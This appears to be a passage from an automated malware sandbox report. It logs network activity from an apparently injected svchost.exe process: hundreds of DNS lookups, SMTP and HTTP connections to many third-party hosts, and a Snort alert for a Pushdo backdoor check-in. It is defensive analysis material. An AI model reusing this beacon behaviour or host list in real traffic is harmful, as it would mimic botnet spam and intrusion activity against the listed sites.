                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: linac.co.uk
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 165.160.15.20 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: uster.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: noblesse.be
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 199.59.243.220 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: bossinst.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: redgiga.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: absblast.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: someikan.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: hubbikes.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: riwn.org
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: t-mould.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 199.59.243.224 80Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: toundo.net
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: geecl.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: dbnet.at
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: ktenergo.ru
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 91.220.211.163 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.diamir.de
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 94.130.146.206 443
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: juso-gr.ch
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.wnsavoy.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.196.145 80Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 142.250.157.27 25
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 31.177.76.70 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.129.138.60 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 62.75.216.107 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: midap.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: smitko.net
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 80.82.115.227 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: yhsll.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: anteph.org
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: hyab.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: mikihan.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: ramkome.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: wahw.com.au
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 23.227.38.32 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 205.178.189.131 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: kayoaiba.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: gbmfg.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: ccssinc.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 27.0.174.59 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: t-trust.jp
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 54.209.32.212 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: pro-fa.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.48.207 443Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: forbin.net
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: cutchie.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: univi.it
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 35.230.155.43 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 3.64.163.50 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: smtp.live.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: grlawcc.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 154.213.117.166 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.ex-olive.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 151.101.2.132 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.33.95 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 66.163.170.48 25Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: coxkitchensandbaths.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: invictus.pl
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: holp-ai.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: shittas.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: bible.org
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: missnue.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 203.137.75.45 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: jsaps.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 153.126.211.112 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 217.160.0.131 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: haigh-me.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 198.49.23.144 25
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 49.212.243.77 25
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 83.223.113.46 443
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: canasil.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: ldh.la.gov
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: cpmteam.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: kevyt.net
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: awfraser.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 85.128.196.22 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: s5w.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: in1.smtp.messagingengine.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: paraski.org
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: araax.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: adventist.ro
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 219.94.129.97 80Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 49.212.232.113 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 74.208.215.145 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: isom.org
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: any-s.net
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 54.36.175.146 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: piacton.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: shztm.ru
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: ciicsc.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.spanesi.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: metaforacom.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 210.140.73.39 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: dhh.la.gov
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: cbras.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: atbauk.org
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: ymlp15.net
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: vvsteknik.dk
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: biosolve.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 203.0.113.0 25
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 208.100.26.245 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 216.239.32.21 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 142.250.27.26 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: atis-sk.ca
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: mackusick.de
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: nekono.net
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: cvswl.org
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.124.249.3 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: cubodown.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: infotech.pl
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: smtp.sbcglobal.yahoo.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: tabbles.net
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: cqdgroup.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.muhr-soehne.de
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 63.251.106.25 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.189.68 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: fortknox.bm
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 212.44.102.57 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: camamat.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: ikulani.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: alexpope.biz
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: cjborden.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 95.174.22.233 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: fundeo.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.79.166 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: lpver.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.151.30.147 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: web-york.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 208.80.123.104 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 103.168.172.216 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: sanfotek.net
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.photo4b.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 103.168.172.220 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: fr-dat.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 35.172.94.1 25
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 195.128.140.29 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: beafin.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: stopllc.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 159.89.244.183 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: dzm.cz
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: oozkranj.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 204.11.56.48 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: arowines.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: rast.se
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: hazmatt.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: fifa-ews.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: aba.org.eg
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: wanoa.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: shiner.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 219.94.128.87 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 82.208.6.9 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 93.187.206.66 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.reglera.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: kustnara.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: msl-lock.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: apcotex.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: scip.org.uk
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.usadig.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 35.214.171.193 443
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 183.90.232.24 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 75.2.95.235 443
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: slower.it
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: okashimo.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.20.220.29 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 85.128.55.51 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: workplus.hu
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: c-drop.net
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: awal.ws
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: jnf.at
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: org
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: top1oil.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: at-shun.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: cjcagent.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: kumaden.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 81.169.145.175 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: daytonir.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: iranytu.net
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.42.105.162 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: banvari.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 178.249.70.75 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 45.142.176.225 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: ccrsi.org
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: snf.it
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: cbaben.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: anduran.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: sinwal.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 52.219.100.19 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: likangds.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: h-et-l.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: kursavto.ru
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: rkengg.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: madjek.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: wolffkran.de
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.jacomfg.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: wnit.org
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: ntc.edu.au
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: captlfix.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.129.18 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: popbook.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: acraloc.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 80.211.41.39 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: eos-i.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: revoldia.net
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: uhsa.edu.ag
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: atb-lit.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: skgm.ru
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: pleszew.policja.gov.pl
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: icd-host.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 54.212.145.129 25
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 13.56.33.8 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: burstner.ru
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 35.154.163.204 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: xinhui.net
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 86.105.245.69 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: aluminox.es
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: ie-roi.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: mijash3.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: xult.org
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: shanks.co.uk
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.22.232.175 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 23.239.201.14 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: vivastay.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 49.212.235.175 443
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 59.106.13.169 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: e-asset.net
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 52.0.29.214 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 193.70.68.254 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: plaske.ua
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: touchfam.ca
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 94.100.180.31 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: indonesiamedia.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: a-domani.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.235.31 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: softizer.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 102.134.49.77 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: rokoron.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: k-nikko.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.193.133 443
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.jroy.net
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: doggybag.org
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: gbp-jp.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: sgk.home.pl
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.185.152 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 46.4.56.54 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: htsmx.net
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 188.114.96.7 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: dwid.de
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: ludea.cz
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: skypearl.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 164.92.82.47 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 198.209.253.30 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: 78san.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: esmoke.net
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: simetar.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: btsi.com.ph
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: agulatex.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: gcss.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 79.96.161.192 25
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.66.220 443
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 148.130.4.196 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.143.148 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: alt4.gmail-smtp-in.l.google.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: magicomm.co.uk
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: xsui.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: nolaoig.org
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: mkm-gr.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: dyag-eng.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: hchc.org
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: webband.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 15.197.204.56 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 188.114.97.7 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 198.100.146.220 80Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: 603888.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 133.242.15.119 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: ascc.org.au
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: canmore.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 34.193.69.252 25Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: pertex.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 94.130.164.242 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: shenhgts.net
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: smtp.mail.yahoo.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: rappich.de
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: insia.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 202.172.28.89 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: biurohera.pl
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: agitz.com.br
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: wantapc.net
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: sokuwan.net
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: duiops.net
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 52.200.51.73 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 31.15.12.103 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: mcseurope.nl
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: orbitgas.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 198.1.81.28 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: fogra.com.pl
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: polprime.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: mondopp.net
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 54.39.198.18 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: deckoviny.cz
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: roewer.de
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: nettle.pl
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: diamir.de
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: zugseil.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.udesign.biz
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: jabian.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: oh28ya.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: nme.co.jp
                  Source: TrafficSnort IDS: 2016867 ET TROJAN Backdoor.Win32.Pushdo.s Checkin 192.168.2.4:49694 -> 188.114.96.7:80
                  Source: unknownDNS traffic detected: query: ascc.org.au replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: atis-sk.ca replaycode: Server failure (2)
                  Source: unknownDNS traffic detected: query: www.speelhal.net replaycode: Server failure (2)
                  Source: unknownDNS traffic detected: query: invictus.pl replaycode: Server failure (2)
                  Source: unknownDNS traffic detected: query: webband.com replaycode: Server failure (2)
                  Source: unknownDNS traffic detected: query: www.udesign.biz replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: amele.com replaycode: Server failure (2)
                  Source: unknownDNS traffic detected: query: mail7.digitalwaves.co.nz replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: amba-tc.si replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: canmore.com replaycode: Server failure (2)
                  Source: unknownDNS traffic detected: query: www.jroy.net replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: eos-i.com replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: awfraser.com replaycode: Server failure (2)
                  Source: unknownDNS traffic detected: query: iranytu.net replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: www.owsports.ca replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: arowines.com replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: avc.com.sa replaycode: Server failure (2)
                  Source: unknownDNS traffic detected: query: zupraha.cz replaycode: Server failure (2)
                  Source: unknownDNS traffic detected: query: anteph.org replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: agitz.com.br replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: chzko.ru replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: polprime.com replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: www.yumgiskor.kz replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: cjcagent.com replaycode: Server failure (2)
                  Source: unknownDNS traffic detected: query: pcoyuncu.com replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: ktenergo.ru replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: toundo.net replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: cpwpb.com replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: actmin.com replaycode: Server failure (2)
                  Source: unknownDNS traffic detected: query: someikan.com replaycode: Server failure (2)
                  Source: unknownDNS traffic detected: query: clysma.com replaycode: Server failure (2)
                  Source: unknownDNS traffic detected: query: workplus.hu replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: grlawcc.com replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: haigh-me.com replaycode: Name error (3)
                  Source: unknownNetwork traffic detected: DNS query count 441
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: flamingorecordings.com
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.se
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: diamir.de
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: ldh.la.gov
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: nts-web.net
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: orlyhotel.com
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.com
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.diamir.de
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: clinicasanluis.com.co
